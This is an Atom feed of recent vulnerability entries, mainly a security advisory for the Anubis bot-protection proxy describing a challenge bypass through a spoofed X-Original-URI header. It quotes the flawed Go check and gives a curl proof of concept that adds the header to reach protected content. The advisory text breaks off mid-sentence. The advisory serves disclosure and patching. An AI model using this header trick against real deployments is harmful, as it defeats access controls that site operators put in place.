<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T15:26:13.087096+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-351620</id>
    <title>EUVD-2026-351620</title>
    <updated>2026-10-08T15:26:13.147244+00:00</updated>
    <content>EUVD-2026-351620</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-351620"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-62314</id>
    <title>fkie_cve-2026-62314</title>
    <updated>2026-10-08T15:26:13.147303+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Anubis is a Web AI Firewall Utility that challenges users' connections in order to protect upstream resources from scraper bots. From 1.22.0 until 1.26.0-pre1, lib/policy/checker.go PathChecker.Check() trusted the client-controlled X-Original-URI header before matching r.URL.Path, allowing an HTTP client to match default data/common/keep-internet-working.yaml ALLOW rules such as ^/\.well-known/.*$ and bypass the Anubis challenge. This issue is fixed in version 1.26.0-pre1.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-62314"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-6wcg-mqvh-fcvg</id>
    <title>GHSA-6wcg-mqvh-fcvg — Anubis: Policy bypass via client controlled X-Original-URI header</title>
    <updated>2026-10-08T15:26:13.147340+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/TecharoHQ/anubis</p>
<p>Any HTTP client can bypass Anubis bot protection on the default configuration by adding a single request header. No challenge needs to be solved.
Affected versions: v1.22.0 through v1.25.0 (introduced in commit d1d631a, PR #1015)</p>
<p>The root cause is in `lib/policy/checker.go`, `PathChecker.Check()`:
```go
func (pc *PathChecker) Check(r *http.Request) (bool, error) {
    originalUrl := r.Header.Get("X-Original-URI")
    if originalUrl != "" {
        if pc.regexp.MatchString(originalUrl) {
            return true, nil
        }
    }
    if pc.regexp.MatchString(r.URL.Path) {
        return true, nil
    }
    return false, nil
}
```</p>
<p>The header value comes directly from the client request. The middleware chain never strips it. In reverse proxy mode an attacker fully controls it.
The default policy imports `data/common/keep-internet-working.yaml`, which contains path-only ALLOW rules with no other conditions:</p>
<p>```yaml
- name: well-known
  path_regex: ^/\.well-known/.*$
  action: ALLOW
```</p>
<p>When `X-Original-URI` matches one of those regexes, the rule fires as ALLOW and the request is forwarded upstream without any challenge or JWT check.</p>
<p># Proof of concept</p>
<p>Normal request, gets challenged:
```
curl -s https://anubis.techaro.lol/ | grep -o "&lt;title&gt;.*&lt;/title&gt;"
```</p>
<p>Bypass, gets upstream content:
```
curl -s -H "X-Original-URI: /.well-known/x" https://anubis.techaro.lol/ | grep -o "&lt;title&gt;.*&lt;/title&gt;"
```</p>
<p>The first command returns the Anubis challenge page title. The second retu…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-6wcg-mqvh-fcvg"/>
  </entry>
</feed>
